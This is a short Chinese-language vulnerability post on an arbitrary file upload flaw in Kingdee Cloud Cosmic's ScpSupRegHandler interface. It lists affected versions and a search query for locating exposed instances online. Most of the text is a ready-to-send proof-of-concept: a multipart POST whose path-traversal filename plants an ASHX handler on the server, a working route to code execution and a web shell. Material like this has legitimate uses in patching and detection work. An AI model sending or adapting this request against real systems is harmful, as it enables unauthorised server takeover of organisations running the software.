漏洞描述：
金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件获取服务器权限
漏洞影响：

金蝶云星空企业版私有云、企业版私有云（订阅）、标准版私有云（订阅）三个产品V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁)

网络测绘：

app="金蝶云星空-管理中心"

漏洞复现：
登陆页面

poc:
(来源互联网)

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: Accept-Encoding: identityContent-Length: 973Accept-Language: zh-CN,zh;q=0.8Accept: */*Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="dbId_v".--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FID"2022--2ac719f8e29343df94aa4ab49e456061Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."Content-Type: text/plain<%@ WebHandler Language="C#" Class="TestHandler" %>        using System;        using System.Web;        public class TestHandler : IHttpHandler {            public void            ProcessRequest (HttpContext context) {                context.Response.ContentType= "text/plain";                context.Response.Write("Test");            }            public bool IsReusable {                get {return false; }            }        }--2ac719f8e29343df94aa4ab49e456061--